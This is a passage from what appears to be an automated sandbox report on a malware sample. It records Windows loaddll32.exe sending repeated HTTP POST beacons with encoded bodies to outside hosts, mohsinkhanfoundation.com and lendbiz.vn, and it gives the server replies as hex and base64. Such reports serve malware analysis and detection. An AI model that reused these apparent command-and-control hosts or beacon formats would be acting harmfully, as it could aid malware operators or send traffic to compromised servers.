                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHtzfkJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          46192.168.2.749837107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:23.062314987 CEST1692OUTPOST /pcQLeLMbur/enl4GDYcBgIOewx5OBp/MiEbKDx8AkJ9dnlkenp3ZXhlew== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:23.500766039 CEST1694INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:23 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 7a 66 30 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHtzf0JBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          47192.168.2.749839107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:23.744116068 CEST1702OUTPOST /pcQLeLMbur/eX0ALgEICTI4BRlyQn12eWR6endleGV7 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:24.136245012 CEST1703INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:23 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 7a 65 45 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHtzeEJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          48192.168.2.749842103.28.36.21280C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:24.987550020 CEST1712OUTPOST /xj3BhHtMbf/PnwTCj8/DwIceXNDenV9ZXt9dGF5ZHw= HTTP/1.1
                                          Host: lendbiz.vn
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:25.857264042 CEST1721INHTTP/1.1 200 OK
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Cache-Control: public, max-age=0
                                          Expires: Mon, 27 Sep 2021 18:26:22 GMT
                                          Content-Length: 270
                                          Date: Mon, 27 Sep 2021 18:26:22 GMT
                                          Server: LiteSpeed
                                          Vary: Accept-Encoding
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 7a 65 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHtzeUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          49192.168.2.749844103.28.36.21280C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:26.282356024 CEST1730OUTPOST /xj3BhHtMbf/cxAvGkZ6c3lifn1yZX5hfA== HTTP/1.1
                                          Host: lendbiz.vn
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:27.115350962 CEST1739INHTTP/1.1 200 OK
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Cache-Control: public, max-age=0
                                          Expires: Mon, 27 Sep 2021 18:26:24 GMT
                                          Content-Length: 270
                                          Date: Mon, 27 Sep 2021 18:26:24 GMT
                                          Server: LiteSpeed
                                          Vary: Accept-Encoding
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 7a 65 6b 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHtzekJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          5192.168.2.749756107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:49.560353041 CEST1029OUTPOST /pcQLeLMbur/HDN9NScAAw8PKwEFMi0/JTI5PEZ6c3lifn1yZX5hfA== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:49.976651907 CEST1102INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:49 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2f 64 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt/dUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          50192.168.2.749847103.28.36.21280C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:27.839397907 CEST1748OUTPOST /xj3BhHtMbf/ew0TDR8RAgoIfT0bIEV+cnhlfXlzZHlieA== HTTP/1.1
                                          Host: lendbiz.vn
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:28.680540085 CEST1757INHTTP/1.1 200 OK
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Cache-Control: public, max-age=0
                                          Expires: Mon, 27 Sep 2021 18:26:25 GMT
                                          Content-Length: 270
                                          Date: Mon, 27 Sep 2021 18:26:25 GMT
                                          Server: LiteSpeed
                                          Vary: Accept-Encoding
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 7a 64 45 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHtzdEJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          51192.168.2.749850103.28.36.21280C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:29.088943005 CEST1759OUTPOST /xj3BhHtMbf/OTo6JTgvJXgEPS9DenV9ZXt9dGF5ZHw= HTTP/1.1
                                          Host: lendbiz.vn
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:29.898808002 CEST1769INHTTP/1.1 200 OK
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Cache-Control: public, max-age=0
                                          Expires: Mon, 27 Sep 2021 18:26:26 GMT
                                          Content-Length: 270
                                          Date: Mon, 27 Sep 2021 18:26:26 GMT
                                          Server: LiteSpeed
                                          Vary: Accept-Encoding
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 7a 64 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHtzdUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          52192.168.2.749852103.28.36.21280C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:30.311337948 CEST1777OUTPOST /xj3BhHtMbf/fTB4IBwfOiwYPxk6GRosPCV9BAJzPwp0C3IvDkV+cnhlfXlzZHlieA== HTTP/1.1
                                          Host: lendbiz.vn
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:31.158032894 CEST1786INHTTP/1.1 200 OK
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Cache-Control: public, max-age=0
                                          Expires: Mon, 27 Sep 2021 18:26:28 GMT
                                          Content-Length: 270
                                          Date: Mon, 27 Sep 2021 18:26:28 GMT
                                          Server: LiteSpeed
                                          Vary: Accept-Encoding
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 79 66 45 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHtyfEJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          53192.168.2.749855103.28.36.21280C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:34.618367910 CEST1822OUTPOST /xj3BhHtMbf/EQsPOCI9HT0CfXsGCQQcIA59PT18Q3p1fWV7fXRheWR8 HTTP/1.1
                                          Host: lendbiz.vn
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          6192.168.2.749762107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:51.025165081 CEST1103OUTPOST /pcQLeLMbur/CAsZDz1/MEJ9dnlkenp3ZXhlew== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:51.413126945 CEST1104INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:51 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2b 66 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt+fUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          7192.168.2.749764107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
